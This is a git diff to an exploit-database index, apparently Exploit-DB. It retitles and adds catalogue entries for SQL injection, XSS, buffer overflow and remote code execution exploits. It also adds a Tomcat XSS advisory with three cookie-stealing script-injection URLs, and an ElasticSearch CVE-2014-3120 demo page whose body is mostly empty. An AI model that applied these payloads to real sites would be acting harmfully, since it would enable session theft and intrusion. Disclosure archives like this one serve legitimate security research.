diff --git a/files.csv b/files.csv index d4a8c9f43..b09dcd2d1 100755 --- a/files.csv +++ b/files.csv @@ -8608,7 +8608,7 @@ id,file,description,date,author,platform,type,port 9125,platforms/php/webapps/9125.txt,"Ebay Clone 2009 Multiple SQL Injection Vulnerabilities",2009-07-11,MizoZ,php,webapps,0 9126,platforms/php/webapps/9126.txt,"Joomla Component com_category (catid) SQL Injection Vulnerability",2009-07-11,Prince_Pwn3r,php,webapps,0 9127,platforms/php/webapps/9127.txt,"d.net CMS Arbitrary Reinstall/Blind SQL Injection Exploit",2009-07-11,darkjoker,php,webapps,0 -9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client (response) Remote BOF Exploit (SEH)",2009-07-12,His0k4,windows,remote,0 +9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client - (response) Remote BOF Exploit (SEH)",2009-07-12,His0k4,windows,remote,0 9129,platforms/php/webapps/9129.txt,"censura 1.16.04 (bsql/xss) Multiple Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0 9130,platforms/php/webapps/9130.txt,"Php AdminPanel Free version 1.0.5 - Remote File Disclosure Vuln",2009-07-12,IRCRASH,php,webapps,0 9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 (USER) Remote Buffer Overflow PoC",2009-07-13,otokoyama,windows,dos,0 @@ -10272,7 +10272,7 @@ id,file,description,date,author,platform,type,port 11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow PoC",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0 11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 (.smi) Local Buffer Overflow PoC",2010-01-19,d3b4g,windows,dos,0 11198,platforms/php/webapps/11198.txt,"al3jeb script Remote Login Bypass Exploit",2010-01-19,"cr4wl3r ",php,webapps,0 -11199,platforms/windows/local/11199.txt,"Windows NT User Mode to Ring 0 Escalation Vulnerability",2010-01-19,"Tavis Ormandy",windows,local,0 +11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring 0 Escalation Vulnerability",2010-01-19,"Tavis Ormandy",windows,local,0 11202,platforms/windows/local/11202.pl,"RM Downloader .m3u BOF (SEH)",2010-01-19,jacky,windows,local,0 11203,platforms/multiple/remote/11203.py,"Pidgin MSN <= 2.6.4 File Download Vulnerability",2010-01-19,"Mathieu GASPARD",multiple,remote,0 11204,platforms/windows/remote/11204.html,"AOL 9.5 ActiveX 0day Exploit (heap spray)",2010-01-20,Dz_attacker,windows,remote,0 @@ -13306,7 +13306,7 @@ id,file,description,date,author,platform,type,port 15334,platforms/windows/dos/15334.py,"MinaliC Webserver 1.0 - Denial of Service Vulnerability",2010-10-27,"John Leitch",windows,dos,0 15335,platforms/php/webapps/15335.txt,"alstrasoft e-friends 4.96 Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0 15336,platforms/windows/remote/15336.txt,"MinaliC Webserver 1.0 - Remote Source Disclosure/File Download",2010-10-27,Dr_IDE,windows,remote,0 -15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA 1.06 Buffer Overflow Exploit",2010-10-27,blake,windows,remote,0 +15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA 1.06 - Buffer Overflow Exploit",2010-10-27,blake,windows,remote,0 15338,platforms/php/webapps/15338.txt,"ACC IMoveis 4.0 - SQL Injection Vulnerability",2010-10-27,EraGoN,php,webapps,0 15340,platforms/php/webapps/15340.txt,"mycart 2.0 - Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0 15341,platforms/multiple/dos/15341.html,"Firefox Interleaving document.write and appendChild Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0 @@ -14162,9 +14162,9 @@ id,file,description,date,author,platform,type,port 16379,platforms/windows/remote/16379.rb,"Microsoft Outlook Express NNTP Response Parsing Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16380,platforms/windows/remote/16380.rb,"CitectSCADA/CitectFacilities ODBC Buffer Overflow",2010-11-14,metasploit,windows,remote,0 16381,platforms/windows/remote/16381.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow",2010-11-14,metasploit,windows,remote,0 -16382,platforms/windows/remote/16382.rb,"DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow",2010-11-30,metasploit,windows,remote,0 -16383,platforms/windows/remote/16383.rb,"DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow",2010-11-30,metasploit,windows,remote,0 -16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow",2010-11-24,metasploit,windows,remote,0 +16382,platforms/windows/remote/16382.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE Buffer Overflow",2010-11-30,metasploit,windows,remote,0 +16383,platforms/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow",2010-11-30,metasploit,windows,remote,0 +16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow",2010-11-24,metasploit,windows,remote,0 16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 Wireless Driver Beacon Rates Overflow",2010-07-03,metasploit,windows,remote,0 16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver Probe Response SSID Overflow",2010-07-03,metasploit,hardware,remote,0 @@ -18829,7 +18829,7 @@ id,file,description,date,author,platform,type,port 21571,platforms/irix/remote/21571.c,"SGI IRIX 6.x rpc.xfsmd Remote Command Execution Vulnerability",2002-06-20,"Last Stage of Delirium",irix,remote,0 21572,platforms/multiple/dos/21572.txt,"Half-Life Server 1.1/3.1 New Player Flood Denial of Service Vulnerability",2002-06-20,"Auriemma Luigi",multiple,dos,0 21573,platforms/cgi/webapps/21573.txt,"YaBB 1 Invalid Topic Error Page Cross Site Scripting Vulnerability",2002-06-21,methodic,cgi,webapps,0 -21574,platforms/unix/remote/21574.txt,"Pirch IRC Client 98 Malformed Link Buffer Overrun Vulnerability",2002-06-21,"David Rude II",unix,remote,0 +21574,platforms/unix/remote/21574.txt,"Pirch IRC 98 Client - Malformed Link Buffer Overrun Vulnerability",2002-06-21,"David Rude II",unix,remote,0 21575,platforms/multiple/dos/21575.txt,"Mod_SSL 2.8.x Off-By-One HTAccess Buffer Overflow Vulnerability",2002-06-22,"Frank DENIS",multiple,dos,0 21576,platforms/windows/remote/21576.txt,"Working Resources BadBlue 1.7 EXT.DLL Cross Site Scripting Vulnerability",2002-06-23,"Matthew Murphy",windows,remote,0 21577,platforms/hp-ux/local/21577.c,"HP CIFS/9000 Server A.01.05/A.01.06 Buffer Overflow Vulnerability",2002-11-06,watercloud,hp-ux,local,0 @@ -21399,7 +21399,7 @@ id,file,description,date,author,platform,type,port 24219,platforms/windows/remote/24219.txt,"IBM ACPRunner 1.2.5 ActiveX Control Dangerous Method Vulnerability",2004-06-16,"eEye Digital Security Team",windows,remote,0 24220,platforms/windows/remote/24220.html,"IBM EGatherer 2.0 ActiveX Control Dangerous Method Vulnerability",2004-06-01,"eEye Digital Security Team",windows,remote,0 24221,platforms/linux/remote/24221.pl,"Asterisk PBX 0.7.x Multiple Logging Format String Vulnerabilities",2004-06-18,kfinisterre@secnetops.com,linux,remote,0 -24222,platforms/linux/dos/24222.c,"ircd-hybrid 7.0.1,ircd-ratbox 1.5.1/2.0 Socket Dequeuing Denial of Service Vulnerability",2004-06-19,"Erik Sperling Johansen",linux,dos,0 +24222,platforms/linux/dos/24222.c,"ircd-hybrid 7.0.1,ircd-ratbox 1.5.1/2.0 - Socket Dequeuing Denial of Service Vulnerability",2004-06-19,"Erik Sperling Johansen",linux,dos,0 24223,platforms/linux/remote/24223.py,"Rlpr 2.0 msg() Function Multiple Vulnerabilities",2004-06-19,jaguar@felinemenace.org,linux,remote,0 24224,platforms/multiple/remote/24224.c,"TildeSlash Monit 1-4 Authentication Handling Buffer Overflow Vulnerability",2004-06-04,"Nilanjan De",multiple,remote,0 24225,platforms/php/webapps/24225.php,"osTicket STS 1.2 Attachment Remote Command Execution Vulnerability",2004-06-21,"Guy Pearce",php,webapps,0 @@ -22559,7 +22559,7 @@ id,file,description,date,author,platform,type,port 25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) all versions (1.x? / 2.x / 3.x) - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0 25442,platforms/php/webapps/25442.txt,"WHMCS 4.x (invoicefunctions.php, id param) - SQL Injection Vulnerability",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 25443,platforms/windows/dos/25443.txt,"Quick Search 1.1.0.189 - Buffer Overflow Vulnerability (SEH)",2013-05-14,ariarat,windows,dos,0 -25444,platforms/linux/local/25444.c,"Linux PERF_EVENTS - Local Root Exploit",2013-05-14,sd,linux,local,0 +25444,platforms/linux/local/25444.c,"Linux 2.6.37-3.x.x PERF_EVENTS - Local Root Exploit",2013-05-14,sd,linux,local,0 25445,platforms/multiple/remote/25445.rb,"SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution",2013-05-14,metasploit,multiple,remote,8000 25446,platforms/multiple/remote/25446.rb,"SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution",2013-05-14,metasploit,multiple,remote,8000 25447,platforms/php/webapps/25447.txt,"AlienVault OSSIM 4.1.2 - Multiple SQL Injection Vulnerabilities",2013-05-14,RunRunLevel,php,webapps,0 @@ -23231,7 +23231,7 @@ id,file,description,date,author,platform,type,port 26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser JavaScript Invalid Address Denial of Service Vulnerability",2005-08-09,"Patrick Webster",osx,dos,0 26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - CSRF Vulnerability",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0 26130,platforms/windows/dos/26130.py,"WinRadius 2.11 - Denial of Service",2013-06-11,npn,windows,dos,0 -26131,platforms/linux/local/26131.c,"Linux kernel perf_swevent_init - Local root Exploit",2013-06-11,"Andrea Bittau",linux,local,0 +26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 perf_swevent_init - Local root Exploit",2013-06-11,"Andrea Bittau",linux,local,0 26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection Vulnerability",2013-06-11,"CWH Underground",php,webapps,0 26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21 26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",2013-06-11,metasploit,windows,remote,0 @@ -26278,7 +26278,7 @@ id,file,description,date,author,platform,type,port 29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall HIPS Process Spoofing Vulnerability",2006-12-15,"Matousec Transparent security",windows,dos,0 29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0 29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 Fusion_Forum_View.PHP Local File Include Vulnerability",2006-12-16,Kacper,php,webapps,0 -29290,platforms/linux/remote/29290.c,"Apache / PHP 5.x Remote Code Execution Exploit",2013-10-29,kingcope,linux,remote,80 +29290,platforms/linux/remote/29290.c,"Apache / PHP 5.x - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,linux,remote,80 29292,platforms/windows/webapps/29292.txt,"XAMPP for Windows 1.8.2 - Blind SQL Injection",2013-10-29,"Sebastián Magof",windows,webapps,0 29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 Haber.ASP SQL Injection Vulnerability",2006-12-16,ShaFuck31,asp,webapps,0 29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 Shout.php HTML Injection Vulnerability",2006-12-18,IMHOT3B,php,webapps,0 @@ -30079,3 +30079,19 @@ id,file,description,date,author,platform,type,port 33363,platforms/multiple/remote/33363.txt,"Opera Web Browser 10.01 'dtoa()' Remote Code Execution Vulnerability",2009-11-20,"Maksymilian Arciemowicz",multiple,remote,0 33364,platforms/linux/remote/33364.txt,"KDE 4.3.3 KDELibs 'dtoa()' Remote Code Execution Vulnerability",2009-11-20,"Maksymilian Arciemowicz",linux,remote,0 33365,platforms/php/webapps/33365.txt,"WordPress WP-PHPList Plugin 2.10.2 'unsubscribeemail' Parameter Cross-Site Scripting Vulnerability",2009-11-29,MustLive,php,webapps,0 +33366,platforms/php/webapps/33366.txt,"WordPress Trashbin Plugin 0.1 'mtb_undelete' Parameter Cross-Site Scripting Vulnerability",2009-11-15,MustLive,php,webapps,0 +33367,platforms/php/webapps/33367.txt,"FireStats WordPress Plugin 1.0.2 Multiple Cross Site Scripting and Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,php,webapps,0 +33368,platforms/php/webapps/33368.html,"FireStats WordPress Plugin 1.0.2 Multiple Cross Site Scripting and Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps,0 +33370,platforms/multiple/webapps/33370.html,"ElasticSearch Remote Code Execution",2014-05-15,"Jeff Geiger",multiple,webapps,0 +33371,platforms/php/webapps/33371.txt,"WordPress WP-Cumulus Plugin 1.x 'tagcloud.swf' Cross-Site Scripting Vulnerability",2009-11-09,MustLive,php,webapps,0 +33372,platforms/php/webapps/33372.html,"Fuctweb CapCC Plugin 1.0 for WordPress CAPTCHA Security Bypass Vulnerability",2009-11-13,MustLive,php,webapps,0 +33373,platforms/php/webapps/33373.txt,"Subscribe to Comments 2.0 WordPress Plugin Multiple Cross Site Scripting Vulnerabilities",2009-11-16,MustLive,php,webapps,0 +33374,platforms/php/webapps/33374.txt,"Cacti 0.8.x graph.php Multiple Parameter XSS",2009-11-21,"Moritz Naumann",php,webapps,0 +33375,platforms/php/webapps/33375.txt,"Quick.Cart 3.4 and Quick.CMS 2.4 Delete Function Cross Site Request Forgery Vulnerability",2009-11-24,"Alice Kaerast",php,webapps,0 +33376,platforms/php/webapps/33376.pl,"klinza professional cms 5.0.1 'menulast.php' Local File Include Vulnerability",2009-11-24,klinza,php,webapps,0 +33377,platforms/php/webapps/33377.txt,"Joomla! ProofReader 1.0 RC9 Component Cross-Site Scripting Vulnerability",2009-11-16,MustLive,php,webapps,0 +33378,platforms/php/webapps/33378.txt,"Joomla! 1.5.x 404 Error Page Cross Site Scripting Vulnerability",2009-11-23,MustLive,php,webapps,0 +33379,platforms/multiple/remote/33379.txt,"Apache Tomcat 3.2 404 Error Page Cross Site Scripting Vulnerability",2009-09-02,MustLive,multiple,remote,0 +33380,platforms/php/webapps/33380.txt,"Power Phlogger 2.2.x Cross-site Scripting Vulnerability",2008-02-16,MustLive,php,webapps,0 +33381,platforms/php/webapps/33381.txt,"Content Module 0.5 for XOOPS 'id' Parameter SQL Injection Vulnerability",2009-11-30,s4r4d0,php,webapps,0 +33382,platforms/php/webapps/33382.txt,"SmartMedia Module 0.85 Beta for XOOPS 'categoryid' Parameter Cross Site Scripting Vulnerability",2009-11-30,SoldierOfAllah,php,webapps,0 diff --git a/platforms/multiple/remote/33379.txt b/platforms/multiple/remote/33379.txt new file mode 100755 index 000000000..df2fd54bd --- /dev/null +++ b/platforms/multiple/remote/33379.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/37149/info + +Apache Tomcat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Tomcat 3.2.1 is affected; other versions may also be vulnerable. + +http://www.example.com/?offset=1&cid=1&limit=%3Cscript%3Ealert(document.cookie)%3C/script%3E +http://www.example.com/?offset=1&cid=%3Cscript%3Ealert(document.cookie)%3C/script%3E +http://www.example.com/?offset=%3Cscript%3Ealert(document.cookie)%3C/script%3E&cid=1 diff --git a/platforms/multiple/webapps/33370.html b/platforms/multiple/webapps/33370.html new file mode 100755 index 000000000..59fd494b8 --- /dev/null +++ b/platforms/multiple/webapps/33370.html @@ -0,0 +1,152 @@ + + + + + + + + + + + + + + + + + + +
+ +
+

CVE-2014-3120 Elastic Search Remote Code Execution

+

This will read and write files from an ES instance vulnerable to CVE-2014-3120.
This is for demonstration purposes only.

+
+
+ +
+
+
+
+
+